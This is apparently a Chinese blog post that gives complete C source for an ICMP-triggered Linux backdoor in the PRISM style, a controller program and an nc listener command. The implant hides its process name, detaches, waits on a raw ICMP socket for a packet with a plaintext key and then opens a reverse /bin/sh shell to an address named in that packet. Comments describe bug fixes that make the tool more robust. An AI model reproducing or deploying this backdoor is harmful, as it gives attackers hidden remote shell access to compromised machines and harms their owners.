版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
监听命令(在控制端主机上运行,等待被控端反连;端口须与控制台程序 DATABUF 中写入的 6666 一致): nc -lvp 6666
木马(被控端:以 root 监听原始 ICMP 套接字,收到带口令的 Echo 请求后向其中指定的地址/端口反弹 shell):
#include "stdio.h"
#include "string.h"
#include "stdlib.h"
#include "signal.h"
#include "arpa/inet.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "unistd.h"
#include "netinet/in.h"
#include "netinet/ip.h"
#include "netinet/ip_icmp.h"
#include "netinet/in_systm.h"
#include "netdb.h"
#include "setjmp.h"
#include "errno.h"
#include <sys/time.h>
#include "stdarg.h"
#include "ctype.h"
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#ifdef STATIC
/* STATIC mode: connect back to a fixed host/port and respawn forever.
 * NOTE: the macro is spelled TEVERSE_HOST (sic); main() below only
 * references it inside commented-out code, so the typo is currently harmless. */
#define TEVERSE_HOST "10.0.0.1"
#define REVERSE_PORT 19832
#define RESPAWN_DELAY 15
#else
/* ICMP mode: maximum bytes read per raw-socket recv(), and the plaintext
 * trigger "key" that must prefix the echo-request payload. The key travels
 * unencrypted, so anyone who can observe the ICMP packet learns it. */
#define ICMP_PACKET_SIZE 1024
#define ICMP_KEY "p4ssw0rd"
#endif
#define VERSION "0.5"
/* Banner written to the socket just before the shell is exec'd (start_reverse_shell). */
#define MOTD "PRISM v"VERSION" started\n\n# "
#define SHELL "/bin/sh"
/* Name written over argv[0] in main() so the process masquerades in ps output. */
#define PROCESS_NAME "udevdaaa"
void icmp_listen(void);
void start_reverse_shell(char * bd_ip,unsigned short int bd_port);
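/*
 * Implant entry point (ICMP mode as compiled here; the original's STATIC
 * respawn loop and "Inf0" info-dump argument were commented-out dead code
 * and are not carried over).
 *
 * 1. Overwrites argv[0] with PROCESS_NAME and blanks the remaining argv
 *    strings so `ps` shows a fake name and no arguments.
 * 2. Forks and lets the parent exit so the child keeps running in the
 *    background.
 * 3. Requires an effective UID of 0: icmp_listen() opens a raw socket,
 *    which needs root (or CAP_NET_RAW). The original tested getgid(),
 *    which says nothing about the privilege the raw socket needs.
 * 4. Hands control to icmp_listen(), which never returns.
 *
 * SIGCHLD is set to SIG_IGN so the shells forked by icmp_listen() are
 * reaped automatically; without it every finished shell lingers as a
 * zombie (the original had this line commented out).
 */
int main(int argc, char *argv[])
{
    signal(SIGCHLD, SIG_IGN);

    /* Hide the real name and arguments from process listings.
     * strncpy is bounded by the length of the existing argv[0] string, so
     * it only overwrites bytes that were already part of that string; the
     * existing terminator stays in place when PROCESS_NAME is longer. */
    if (argc > 0 && argv[0] != NULL) {
        strncpy(argv[0], PROCESS_NAME, strlen(argv[0]));
    }
    for (int i = 1; i < argc; ++i) {
        memset(argv[i], ' ', strlen(argv[i]));
    }

    /* Detach: parent exits, child continues. A failed fork() (-1) also
     * makes this process exit rather than run the listener undetached. */
    if (fork() != 0) {
        exit(EXIT_SUCCESS);
    }

    /* Raw ICMP sockets need root: check the effective UID, not the GID. */
    if (geteuid() != 0) {
        fprintf(stdout, "I`m noot root: :(\n");
        exit(EXIT_FAILURE);
    }

    icmp_listen();
    return EXIT_SUCCESS;
}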
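/*
 * Block forever on a raw ICMP socket waiting for a trigger packet.
 *
 * A packet triggers a reverse shell when:
 *   - it is an ICMP echo request (ICMP_ECHO), and
 *   - its payload starts with ICMP_KEY, followed by one separator byte,
 *     followed by "<ipv4-or-host> <port>" (parsed with sscanf).
 * On a match the listener forks and the child calls start_reverse_shell().
 *
 * Security notes for anyone studying this sample:
 *   - The key is a plaintext prefix compared with memcmp(); it is not a
 *     secret from anyone who can observe the ICMP packet on the wire.
 *   - The connect-back address is taken straight from the packet, so
 *     whoever knows the key decides where the shell goes.
 *
 * Fixes relative to the original:
 *   - socket() failure is reported and the function returns instead of
 *     spinning on recv() of fd -1.
 *   - The ICMP header is located via ip_hl (IP options are possible),
 *     matching the controller's unpack(), instead of assuming 20 bytes.
 *   - The received length is checked before any header field or key byte
 *     is read, so a short packet cannot cause an out-of-bounds read.
 *   - The port is checked against 1..65535 before being narrowed to
 *     unsigned short (the original accepted e.g. 70000 and silently used
 *     the wrapped value).
 */
void icmp_listen(void)
{
    /* One extra byte keeps buf NUL-terminated for the %s debug print. */
    char buf[ICMP_PACKET_SIZE + 1];
    const size_t icmp_key_size = strlen(ICMP_KEY);
    /* ICMP header: type, code, cksum, id, seq = 8 bytes before icmp_data. */
    const size_t icmp_hdr_size = 8;

    int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
    if (sockfd < 0) {
        perror("socket");
        return;
    }

    for (;;) {
        memset(buf, 0, sizeof(buf));
        ssize_t n = recv(sockfd, buf, ICMP_PACKET_SIZE, 0);
        printf("icmp come...\n");
        if (n <= 0) {
            continue;
        }

        /* Need a complete minimal IP header before ip_hl can be read. */
        if ((size_t)n < sizeof(struct ip)) {
            continue;
        }
        const struct ip *ip = (const struct ip *)buf;
        size_t iphdrlen = (size_t)ip->ip_hl << 2;
        /* Reject bogus header lengths and packets too short to carry the
         * ICMP header plus the key and its separator byte. */
        if (iphdrlen < sizeof(struct ip) ||
            (size_t)n < iphdrlen + icmp_hdr_size + icmp_key_size + 1) {
            continue;
        }
        const struct icmp *icmp = (const struct icmp *)(buf + iphdrlen);
        const char *payload = (const char *)icmp->icmp_data;

        printf("jieshouchangdi:%zd\n", n);
        printf("neirong:%s\n", payload);

        if (icmp->icmp_type != ICMP_ECHO ||
            memcmp(payload, ICMP_KEY, icmp_key_size) != 0) {
            continue;
        }
        printf("yazhengtongguo\n");

        /* After "<key><sep>" comes "<ip> <port>"; %15s bounds the address
         * copy to the 16-byte buffer. */
        char bd_ip[16] = {0};
        int bd_port = 0;
        if (sscanf(payload + icmp_key_size + 1, "%15s %d", bd_ip, &bd_port) != 2) {
            continue;
        }
        /* Shortest dotted quad is 7 chars ("1.1.1.1"); port must fit 16 bits. */
        if (bd_port <= 0 || bd_port > 65535 || strlen(bd_ip) < 7) {
            continue;
        }

        if (fork() == 0) {
            start_reverse_shell(bd_ip, (unsigned short)bd_port);
            exit(EXIT_SUCCESS);
        }
    }
}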
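/*
 * Connect to bd_ip:bd_port over TCP, send the MOTD banner, then replace
 * this process with SHELL whose stdin/stdout/stderr are the socket.
 *
 * bd_ip    dotted-quad or hostname (resolved with gethostbyname, IPv4 only).
 * bd_port  TCP port in host byte order.
 *
 * Returns without a shell if the socket cannot be created, the name does
 * not resolve to an IPv4 address, or connect() fails. Returns after
 * close(sd) only if execl() itself fails; on success execl never returns.
 *
 * Fixes relative to the original: the socket is closed on every failure
 * path (it leaked on resolve/connect failure), and the address copy is
 * bounded by sizeof sin_addr instead of trusting h_length blindly.
 */
void start_reverse_shell(char *bd_ip, unsigned short int bd_port)
{
    int sd = socket(AF_INET, SOCK_STREAM, 0);
    if (sd < 0) {
        return;
    }

    struct hostent *server = gethostbyname(bd_ip);
    /* Only an IPv4 address fits into sockaddr_in; reject anything else. */
    if (server == NULL || server->h_addrtype != AF_INET ||
        server->h_length != (int)sizeof(struct in_addr)) {
        close(sd);
        return;
    }

    struct sockaddr_in serv_addr;
    memset(&serv_addr, 0, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    memcpy(&serv_addr.sin_addr, server->h_addr, sizeof(serv_addr.sin_addr));
    serv_addr.sin_port = htons(bd_port);

    if (connect(sd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
        close(sd);
        return;
    }

    /* Banner is best-effort, as in the original; the shell is exec'd
     * regardless of whether the peer received it. */
    (void)write(sd, MOTD, strlen(MOTD));

    /* Point the standard descriptors at the socket, then exec the shell. */
    dup2(sd, STDIN_FILENO);
    dup2(sd, STDOUT_FILENO);
    dup2(sd, STDERR_FILENO);
    execl(SHELL, SHELL, (char *)0);
    /* Only reached if execl failed. */
    close(sd);
}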
控制台程序(控制端:向目标发送一个 ICMP Echo 请求,载荷为 DATABUF 中的"口令 回连IP 端口",需要 root 权限创建原始套接字)
#include "stdio.h"
#include "string.h"
#include "stdlib.h"
#include "signal.h"
#include "arpa/inet.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "unistd.h"
#include "netinet/in.h"
#include "netinet/ip.h"
#include "netinet/ip_icmp.h"
#include "netdb.h"
#include "setjmp.h"
#include "errno.h"
#include <sys/time.h>
#define PACKET_SIZE 4096
/* Seconds to wait for a reply before statistics() fires via SIGALRM. */
#define MAX_WAIT_TIME 5
#define MAX_NO_PACKETS 1
#define DATA_LEN 56
/* Trigger payload: "<key> <connect-back ip> <port>". The key must equal the
 * implant's ICMP_KEY; the single space after it is the separator byte the
 * implant skips before sscanf("%15s %d"). The zero-padded address is exactly
 * 15 characters, the most %15s accepts. NOTE(review): a resolver may read
 * zero-padded octets as octal -- harmless for 000/001, but verify before
 * changing the address. */
#define DATABUF "p4ssw0rd 127.000.000.001 6666"
/* Outgoing request (filled by pack) and incoming reply (filled by recv_packet). */
char sendpacket[PACKET_SIZE];
char recvpacket[PACKET_SIZE];
/* Counters reported by statistics(). */
int nsend =0,nreceived = 0;
struct timeval tvrecv;
/* Sender address of the last reply, as filled in by recvfrom(). */
struct sockaddr_in from;
void statistics(int signo);
unsigned short cal_chksum(unsigned short *addr,int len);
int pack (int pack_no,int pid);
void send_packet(int sockfd,int pid,struct sockaddr_in dest_addr);
void recv_packet(int sockfd,int pid);
int unpack(char * buf,int len,int pid);
void tv_sub(struct timeval * out,struct timeval *in);
/* SIGALRM handler and final report: prints the sent/received/lost counts
 * kept in the globals nsend and nreceived, then terminates the program
 * with status 1. main() also calls it directly once receiving is done. */
void statistics(int signo)
{
    (void)signo;
    int lost = nsend - nreceived;
    printf("\n-----------------------------PING statistics--------------------------\n");
    printf("%d packets transmitted,%d received,%d lost\n", nsend, nreceived, lost);
    exit(1);
}
/* RFC 1071 Internet checksum over len bytes starting at addr: sum the
 * 16-bit words, fold the carries back in, return the one's complement.
 * A trailing odd byte is added as the low-order byte of a zero-padded
 * 16-bit word. */
unsigned short cal_chksum(unsigned short *addr, int len)
{
    const unsigned short *word = addr;
    int remaining = len;
    int total = 0;

    for (; remaining > 1; remaining -= 2) {
        total += *word++;
    }

    if (remaining == 1) {
        unsigned short last = 0;
        *(unsigned char *)&last = *(const unsigned char *)word;
        total += last;
    }

    total = (total >> 16) + (total & 0xffff);
    total += total >> 16;
    return (unsigned short)~total;
}
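/*
 * Build one ICMP echo request in the global sendpacket[].
 *
 * pack_no  sequence number stored in icmp_seq (host byte order, as the
 *          original did; the reply echoes it back unchanged).
 * pid      process id, narrowed to the 16-bit icmp_id field. unpack()
 *          must compare against the same narrowed value.
 *
 * Returns the number of bytes to send, sizeof(DATABUF) + DATA_LEN
 * (30 + 56 = 86), which covers the 8-byte ICMP header, the DATABUF
 * payload and zero padding (sendpacket is a zero-initialised global).
 * The checksum is computed over exactly those bytes. The original
 * comment claimed "56 = ICMP header, 8 = data"; the header is 8 bytes.
 *
 * The payload "<key> <ip> <port>" is what the implant's icmp_listen()
 * parses; the single space after the key is the separator byte it skips.
 *
 * Fixes relative to the original: unused locals (i, tval, a second copy
 * of the DATABUF literal) removed; the copy uses memcpy with the literal's
 * full size, which includes the terminating NUL.
 */
int pack(int pack_no, int pid)
{
    struct icmp *icmp = (struct icmp *)sendpacket;

    icmp->icmp_type = ICMP_ECHO;
    icmp->icmp_code = 0;
    icmp->icmp_cksum = 0;                   /* must be zero while summing */
    icmp->icmp_seq = (unsigned short)pack_no;
    icmp->icmp_id = (unsigned short)pid;    /* ICMP has no ports; id tags our replies */

    /* sizeof(DATABUF) includes the NUL, so the payload stays a C string
     * for the implant's sscanf()/printf("%s"). */
    int packsize = (int)sizeof(DATABUF) + DATA_LEN;
    memcpy(icmp->icmp_data, DATABUF, sizeof(DATABUF));

    icmp->icmp_cksum = cal_chksum((unsigned short *)icmp, packsize);
    return packsize;
}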
/* Send up to MAX_NO_PACKETS echo requests to dest_addr, one per second.
 * Every attempt is counted in the global nsend, even when sendto fails. */
void send_packet(int sockfd, int pid, struct sockaddr_in dest_addr)
{
    while (nsend < MAX_NO_PACKETS) {
        ++nsend;
        int len = pack(nsend, pid);
        ssize_t sent = sendto(sockfd, sendpacket, len, 0,
                              (struct sockaddr *)&dest_addr, sizeof(dest_addr));
        if (sent == -1) {
            perror("sendto error");
            continue;
        }
        sleep(1);
    }
}
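/*
 * Receive echo replies until nreceived catches up with nsend.
 *
 * Each wait is bounded by alarm(MAX_WAIT_TIME); when it fires, the
 * statistics() handler prints the report and exits the program, so this
 * loop cannot hang forever on a silent target. Packets that unpack()
 * rejects (not a reply, wrong id, too short) are not counted.
 *
 * Fixes relative to the original: the `extern int errno;` declaration is
 * gone (<errno.h> already provides errno, and redeclaring it as a plain
 * int is fragile on implementations where errno is a macro), and the
 * address length passed to recvfrom() is a socklen_t as the API requires.
 */
void recv_packet(int sockfd, int pid)
{
    signal(SIGALRM, statistics);

    while (nreceived < nsend) {
        alarm(MAX_WAIT_TIME);

        socklen_t fromlen = sizeof(from);
        ssize_t n = recvfrom(sockfd, recvpacket, sizeof(recvpacket), 0,
                             (struct sockaddr *)&from, &fromlen);
        if (n == -1) {
            /* EINTR: a signal (normally the alarm) interrupted the call. */
            if (errno == EINTR) {
                continue;
            }
            perror("recvfrom error");
            continue;
        }

        gettimeofday(&tvrecv, NULL);
        if (unpack(recvpacket, (int)n, pid) == -1) {
            continue;
        }
        nreceived++;
    }
}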
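/*
 * Validate one received packet as an echo reply to our request.
 *
 * buf  raw packet as delivered by the raw socket: IPv4 header + ICMP.
 * len  total bytes received.
 * pid  our process id; replies are matched on icmp_id == (uint16_t)pid.
 *
 * Returns 0 when buf is an ICMP_ECHOREPLY addressed to us (after printing
 * the payload and a one-line summary), -1 otherwise.
 *
 * Fixes relative to the original:
 *   - The success path now returns 0; the original fell off the end of a
 *     non-void function, so the caller compared against garbage.
 *   - ip_hl is range-checked against len before it is trusted.
 *   - The payload is copied with a length derived from len and capped at
 *     the local buffer, instead of strcpy() from recvpacket, which is
 *     reused between packets and never NUL-terminated. The reply payload
 *     is chosen by the remote host, so the original was a stack overflow
 *     under attacker control.
 *   - icmp_id is compared with pid narrowed to 16 bits; with pids above
 *     65535 the original comparison could never succeed.
 *   - TTL is read from the IP header; the original printed an arithmetic
 *     accident through a mismatched %d/size_t. The "rtt" field is dropped:
 *     no timestamp is ever sent, so the value it showed was meaningless.
 */
int unpack(char *buf, int len, int pid)
{
    if (len < (int)sizeof(struct ip)) {
        return -1;
    }
    struct ip *ip = (struct ip *)buf;
    int iphdrlen = ip->ip_hl << 2;
    if (iphdrlen < (int)sizeof(struct ip) || iphdrlen > len) {
        return -1;
    }

    struct icmp *icmp = (struct icmp *)(buf + iphdrlen);
    len -= iphdrlen;
    /* 8 = ICMP header: type, code, cksum, id, seq. */
    if (len < 8) {
        printf("ICMP packets `s h_length is less than 8\n");
        return -1;
    }

    if (icmp->icmp_type != ICMP_ECHOREPLY || icmp->icmp_id != (unsigned short)pid) {
        return -1;
    }

    /* Copy only bytes that belong to this packet, bounded by the local
     * buffer, and NUL-terminate explicitly. */
    char data[1024];
    size_t payload_len = (size_t)(len - 8);
    if (payload_len > sizeof(data) - 1) {
        payload_len = sizeof(data) - 1;
    }
    memcpy(data, icmp->icmp_data, payload_len);
    data[payload_len] = '\0';
    printf("printfdata: %s\n", data);

    printf("%d byte from %s: icmp_seq=%d ttl=%d\n",
           len, inet_ntoa(from.sin_addr), icmp->icmp_seq, ip->ip_ttl);
    return 0;
}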
/* In-place timeval subtraction: *out -= *in, borrowing one second when
 * the microsecond field goes negative. */
void tv_sub(struct timeval *out, struct timeval *in)
{
    suseconds_t usec = out->tv_usec - in->tv_usec;
    time_t sec = out->tv_sec - in->tv_sec;
    if (usec < 0) {
        usec += 1000000;
        sec -= 1;
    }
    out->tv_sec = sec;
    out->tv_usec = usec;
}
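/*
 * Controller entry point: send one echo request carrying DATABUF to
 * argv[1], wait for the reply, print statistics.
 *
 * argv[1] is a hostname or a dotted-quad IPv4 address.
 *
 * Fixes relative to the original:
 *   - `if (inaddr=inet_addr(argv[1])==INADDR_NONE)` assigned the result
 *     of the comparison (0 or 1) to inaddr, so any literal address was
 *     sent to 0.0.0.0 (and the memcpy then copied sizeof(unsigned long)
 *     bytes into a 4-byte sin_addr). inet_pton() replaces it.
 *   - setuid(getuid()) is checked: if dropping root fails, the program
 *     must not continue with more privilege than intended.
 *   - gethostbyname results are checked to be IPv4 of the expected size
 *     before the copy into sin_addr.
 *   - The unused host/protocol/waittime/inaddr locals are gone.
 */
int main(int argc, char const *argv[])
{
    if (argc < 2) {
        printf("usage:%s hostname/IP address\n", argv[0]);
        exit(1);
    }

    struct protoent *protocol = getprotobyname("icmp");
    if (protocol == NULL) {
        perror("getprotobyname");
        exit(1);
    }

    /* A raw socket needs root (or CAP_NET_RAW); create it first, then
     * drop privileges. */
    int sockfd = socket(AF_INET, SOCK_RAW, protocol->p_proto);
    if (sockfd < 0) {
        perror("socket error");
        exit(1);
    }

    if (setuid(getuid()) != 0) {
        perror("setuid");
        exit(1);
    }

    /* Larger receive buffer; non-fatal if the kernel refuses it. */
    int size = 50 * 1024;
    if (setsockopt(sockfd, SOL_SOCKET, SO_RCVBUF, &size, sizeof(size)) != 0) {
        perror("setsockopt SO_RCVBUF");
    }

    struct sockaddr_in dest_addr;
    memset(&dest_addr, 0, sizeof(dest_addr));
    dest_addr.sin_family = AF_INET;

    /* Literal IPv4 address first; otherwise resolve the name. */
    if (inet_pton(AF_INET, argv[1], &dest_addr.sin_addr) != 1) {
        struct hostent *host = gethostbyname(argv[1]);
        if (host == NULL || host->h_addrtype != AF_INET ||
            host->h_length != (int)sizeof(dest_addr.sin_addr)) {
            perror("gethostbyname");
            exit(1);
        }
        memcpy(&dest_addr.sin_addr, host->h_addr, sizeof(dest_addr.sin_addr));
    }

    printf("PING %s(%s): %d bytes data in ICMP packets.\n",
           argv[1], inet_ntoa(dest_addr.sin_addr), MAX_NO_PACKETS);

    pid_t pid = getpid();
    send_packet(sockfd, pid, dest_addr);
    recv_packet(sockfd, pid);
    statistics(SIGALRM);   /* prints the report and exits with status 1 */
    close(sockfd);
    return 0;
}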